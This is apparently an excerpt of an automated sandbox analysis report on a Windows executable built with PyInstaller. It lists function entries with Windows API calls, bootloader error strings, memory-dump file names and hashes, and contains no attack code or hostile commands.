                                                                    • Opcode Fuzzy Hash: 17c3eaeb34264a701bb66d7ce4ab8a897af2982fe98c3a48157bd34433a5c608
                                                                    • Instruction Fuzzy Hash: D112D56BE2C24386FB205E14D9542BD76A1FB80758FC45A35E689876C4FF3EF4849B04
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: f$f$p$p$f
                                                                    • API String ID: 3215553584-1325933183
                                                                    • Opcode ID: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
                                                                    • Instruction ID: d939ed03629346d9326cb0d4712d9bddff71f6a12f461de45e6f35e339dc6142
                                                                    • Opcode Fuzzy Hash: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
                                                                    • Instruction Fuzzy Hash: B9129563E2C14386FB289F15E05467D7251FB40758F885B35E69A876C4EF7EF4808B22
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: Message
                                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                    • API String ID: 2030045667-3659356012
                                                                    • Opcode ID: 761ce7a978ea73055f409a8efa6d9d3f94081396f2c7bd0fb59cc1d7c7ef1a6c
                                                                    • Instruction ID: 15655b8b6db1da0c43e9953311e23eb7f0a2ec5715f8cbebcb3c65a7336ed57d
                                                                    • Opcode Fuzzy Hash: 761ce7a978ea73055f409a8efa6d9d3f94081396f2c7bd0fb59cc1d7c7ef1a6c
                                                                    • Instruction Fuzzy Hash: 30319123B3964396EA24DF51A8001BA63A0EF047D8F586A32DE4DC7A99FE3CF541C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 849930591-393685449
                                                                    • Opcode ID: 5b2106ab85fd7efcab108e3077ecf48f9db79865e243ba23a6eb4b146be1c4dd
                                                                    • Instruction ID: a2726438e20925fc4180e48878b1accf76950024a1a7790042b8f4b08f98092f
                                                                    • Opcode Fuzzy Hash: 5b2106ab85fd7efcab108e3077ecf48f9db79865e243ba23a6eb4b146be1c4dd
                                                                    • Instruction Fuzzy Hash: 99E18273A387459AEB209F2594802AD7BA0FB447C8F145A35EE4D97B95EF38F181C740
                                                                    APIs
                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF67D00101D), ref: 00007FF67D008847
                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF67D00101D), ref: 00007FF67D00889E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide
                                                                    • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                    • API String ID: 626452242-27947307
                                                                    • Opcode ID: 98e3f50c3a54fb3626cc495b15e5889180a4fd66a07709a9bac3ea4f6983fc88
                                                                    • Instruction ID: b1a7314ee8f7d1f9262b494fa2e9cc5a7a6d0ca6adb004b0325c2029fcdab231
                                                                    • Opcode Fuzzy Hash: 98e3f50c3a54fb3626cc495b15e5889180a4fd66a07709a9bac3ea4f6983fc88
                                                                    • Instruction Fuzzy Hash: C4419433A2DB4282E620DF15B84017AB7A1FB88794F546A35DA8D87B94EF3CF445D700
                                                                    APIs
                                                                    • WideCharToMultiByte.KERNEL32(?,00007FF67D0039EA), ref: 00007FF67D008D31
                                                                      • Part of subcall function 00007FF67D0029E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF67D0088F2,?,?,?,?,?,?,?,?,?,?,?,00007FF67D00101D), ref: 00007FF67D002A14
                                                                      • Part of subcall function 00007FF67D0029E0: MessageBoxW.USER32 ref: 00007FF67D002AF0
                                                                    • WideCharToMultiByte.KERNEL32(?,00007FF67D0039EA), ref: 00007FF67D008DA5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                    • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                    • API String ID: 3723044601-27947307
                                                                    • Opcode ID: df8f2b068844af15c3f6e460c074a8b6e33bcf198047290cefaa6cf113e0804d
                                                                    • Instruction ID: 14f98e96da62e3736ceadfbc1d238a6c79d23b822262b627012619339fc42e98
                                                                    • Opcode Fuzzy Hash: df8f2b068844af15c3f6e460c074a8b6e33bcf198047290cefaa6cf113e0804d
                                                                    • Instruction Fuzzy Hash: F1214B33A29B4295EA10DF26A8410797761FB94BD4B985B36DA4D87B94FF3CF901C380
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                                    • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                                    • API String ID: 3231891352-3501660386
                                                                    • Opcode ID: b8edc2df1dc3824726c17e6b328eac6ac6c51d76222b1f2205ec89629566f1b2
                                                                    • Instruction ID: 2c2170d2d0349d0c8535527074f68395a8cffa9d3d2f25816fe50bbe528276d1
                                                                    • Opcode Fuzzy Hash: b8edc2df1dc3824726c17e6b328eac6ac6c51d76222b1f2205ec89629566f1b2
                                                                    • Instruction Fuzzy Hash: FD51B323A3D64365FA60AF2599086BD6291AFC47C4F582B35E98DC77D6FE6CF8008340
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF67D00E16A,?,?,?,00007FF67D00DE5C,?,?,00000001,00007FF67D00DA79), ref: 00007FF67D00DF3D
                                                                    • GetLastError.KERNEL32(?,?,?,00007FF67D00E16A,?,?,?,00007FF67D00DE5C,?,?,00000001,00007FF67D00DA79), ref: 00007FF67D00DF4B
                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF67D00E16A,?,?,?,00007FF67D00DE5C,?,?,00000001,00007FF67D00DA79), ref: 00007FF67D00DF75
                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF67D00E16A,?,?,?,00007FF67D00DE5C,?,?,00000001,00007FF67D00DA79), ref: 00007FF67D00DFBB
                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF67D00E16A,?,?,?,00007FF67D00DE5C,?,?,00000001,00007FF67D00DA79), ref: 00007FF67D00DFC7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                    • String ID: api-ms-
                                                                    • API String ID: 2559590344-2084034818
                                                                    • Opcode ID: 9872d352a920fe7d45116cdfab482bad5ae926fb7a0a3cc3bdcd692ff81b7137
                                                                    • Instruction ID: 7cf784113a2504d594892460b0787468d0545cc0462567a7f25379714039764c
                                                                    • Opcode Fuzzy Hash: 9872d352a920fe7d45116cdfab482bad5ae926fb7a0a3cc3bdcd692ff81b7137
                                                                    • Instruction Fuzzy Hash: 9931C122A3A742A4EA119F12A8006792394BF4CBE4F5D6F34DD1D9BB94FE3CF4418320
                                                                    APIs
                                                                      • Part of subcall function 00007FF67D008BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67D002ABB), ref: 00007FF67D008C1A
                                                                    • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF67D0079B1,00000000,?,00000000,00000000,?,00007FF67D00154F), ref: 00007FF67D00748F
                                                                      • Part of subcall function 00007FF67D002B30: MessageBoxW.USER32 ref: 00007FF67D002C05
                                                                    Strings
                                                                    • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF67D007466
                                                                    • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF67D0074A3
                                                                    • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF67D0074EA
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                    • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                    • API String ID: 1662231829-3498232454
                                                                    • Opcode ID: 77d71ece404ba1356ce9a902b83c671c0216e67cf3ae39c1a807b2b426092734
                                                                    • Instruction ID: 02977a623ff17e9c7f4454f9890e9d131dd5a3a2139441295602507ad5c49c1c
                                                                    • Opcode Fuzzy Hash: 77d71ece404ba1356ce9a902b83c671c0216e67cf3ae39c1a807b2b426092734
                                                                    • Instruction Fuzzy Hash: 3C31A713B3D78291FA21EF21E9553FA5251AF987C4F442E31DA8EC26D6FE2CF5048610
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67D002ABB), ref: 00007FF67D008C1A
                                                                      • Part of subcall function 00007FF67D0029E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF67D0088F2,?,?,?,?,?,?,?,?,?,?,?,00007FF67D00101D), ref: 00007FF67D002A14
                                                                      • Part of subcall function 00007FF67D0029E0: MessageBoxW.USER32 ref: 00007FF67D002AF0
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67D002ABB), ref: 00007FF67D008CA0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                    • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                    • API String ID: 3723044601-876015163
                                                                    • Opcode ID: 887d82444744575df418bfd41b6e48fc3edc0b171f656e4d5f6c7ee70eb32595
                                                                    • Instruction ID: 2239ff0baf3c397312b7fe25e2fbc438493c988069aef07b231ac0b44cc39ad7
                                                                    • Opcode Fuzzy Hash: 887d82444744575df418bfd41b6e48fc3edc0b171f656e4d5f6c7ee70eb32595
                                                                    • Instruction Fuzzy Hash: 9C217323B29A4291EB50DF29F841069A361FB887D8B985A31DB4CC3B69FF3CF5418700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: Value$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 2506987500-0
                                                                    • Opcode ID: d6b3d2f040457b211bbd558a75f8735b46039f0c707bc714d8073d9d5dde1fa4
                                                                    • Instruction ID: ea25b9e31167ba5cf2c282d0bf660860f9eb8bd29ae5b75a51e6e2e0fb87583c
                                                                    • Opcode Fuzzy Hash: d6b3d2f040457b211bbd558a75f8735b46039f0c707bc714d8073d9d5dde1fa4
                                                                    • Instruction Fuzzy Hash: D5218023E2C64245FA256F71565113D2A529F45BB8F146F38D93DC76DAFF2EB4018300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                    • String ID: CONOUT$
                                                                    • API String ID: 3230265001-3130406586
                                                                    • Opcode ID: dc1a3cb66a96e2c92b05876df44f34e6b44b08b84d7dcdae92150d4fed606b6a
                                                                    • Instruction ID: d6d1559f9152673f83eba7e8c454ed49755a91e4132df6c0717618cca88c1420
                                                                    • Opcode Fuzzy Hash: dc1a3cb66a96e2c92b05876df44f34e6b44b08b84d7dcdae92150d4fed606b6a
                                                                    • Instruction Fuzzy Hash: EA118122A29B5186E7508F52E85472966A4FB88BE8F445734DA2DC77A4EF3CF4448740
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,?,00007FF67D0155CD,?,?,?,?,00007FF67D01F2BF,?,?,00000000,00007FF67D01BAA6,?,?,?), ref: 00007FF67D01B997
                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF67D0155CD,?,?,?,?,00007FF67D01F2BF,?,?,00000000,00007FF67D01BAA6,?,?,?), ref: 00007FF67D01B9CD
                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF67D0155CD,?,?,?,?,00007FF67D01F2BF,?,?,00000000,00007FF67D01BAA6,?,?,?), ref: 00007FF67D01B9FA
                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF67D0155CD,?,?,?,?,00007FF67D01F2BF,?,?,00000000,00007FF67D01BAA6,?,?,?), ref: 00007FF67D01BA0B
                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF67D0155CD,?,?,?,?,00007FF67D01F2BF,?,?,00000000,00007FF67D01BAA6,?,?,?), ref: 00007FF67D01BA1C
                                                                    • SetLastError.KERNEL32(?,?,?,00007FF67D0155CD,?,?,?,?,00007FF67D01F2BF,?,?,00000000,00007FF67D01BAA6,?,?,?), ref: 00007FF67D01BA37
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: Value$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 2506987500-0
                                                                    • Opcode ID: 536f357d1ee80c1e196f933d1d81fce24c1417f622f166844e4e845bffee9f59
                                                                    • Instruction ID: 45a18cd5b4acbd6a50eac7ea53895790b4fc702429005fc77054ced0c27097ba
                                                                    • Opcode Fuzzy Hash: 536f357d1ee80c1e196f933d1d81fce24c1417f622f166844e4e845bffee9f59
                                                                    • Instruction Fuzzy Hash: F0118C23E2D74246FA14AF71964127D2A925F457B8F446F38E93EC76DAFF6EB4024200
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 2395640692-629598281
                                                                    • Opcode ID: 693f609b9fae876419381cc446d630854629708ee6e32f1efd9795666748e69d
                                                                    • Instruction ID: f9543378fdd55ed37434ea44517c3f100bb90b29aad4c6965ebc95831ba608c3
                                                                    • Opcode Fuzzy Hash: 693f609b9fae876419381cc446d630854629708ee6e32f1efd9795666748e69d
                                                                    • Instruction Fuzzy Hash: 7751B133A39602A6D714CF15E404B693795FB84BD8F58AA34DA4E87B48FF78F8418724
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                    • String ID: Unhandled exception in script
                                                                    • API String ID: 3081866767-2699770090
                                                                    • Opcode ID: a3b5eef46e4e1fc382e5a4159730c6506ff8be504f9b8c49e81b7d5c4bb5797b
                                                                    • Instruction ID: 22c6ed26e065af1d68735fcb715e70f77c1589594e0fe50526d7e6a5e8a65339
                                                                    • Opcode Fuzzy Hash: a3b5eef46e4e1fc382e5a4159730c6506ff8be504f9b8c49e81b7d5c4bb5797b
                                                                    • Instruction Fuzzy Hash: 27317033A29A8285EB20DF25E8551FD6760FF88788F401635EA4D8BB59EF3CE204C700
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF67D0088F2,?,?,?,?,?,?,?,?,?,?,?,00007FF67D00101D), ref: 00007FF67D002A14
                                                                      • Part of subcall function 00007FF67D008570: GetLastError.KERNEL32(00000000,00007FF67D002A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF67D00101D), ref: 00007FF67D008597
                                                                      • Part of subcall function 00007FF67D008570: FormatMessageW.KERNEL32 ref: 00007FF67D0085C6
                                                                      • Part of subcall function 00007FF67D008BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67D002ABB), ref: 00007FF67D008C1A
                                                                    • MessageBoxW.USER32 ref: 00007FF67D002AF0
                                                                    • MessageBoxA.USER32 ref: 00007FF67D002B0C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                    • String ID: %s%s: %s$Fatal error detected
                                                                    • API String ID: 2806210788-2410924014
                                                                    • Opcode ID: 17bde7baa48798fc9044701dc9e2f5590094afa9c40027f5b89001a931553ba1
                                                                    • Instruction ID: 1973520481d870f5537a89543af5213587756f5179193ebd340a5a78704f27c5
                                                                    • Opcode Fuzzy Hash: 17bde7baa48798fc9044701dc9e2f5590094afa9c40027f5b89001a931553ba1
                                                                    • Instruction Fuzzy Hash: 9F312173638A8291E630DF10E4516DA6764FF847C4F406636EA8D82A99EF3CF745CB40
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
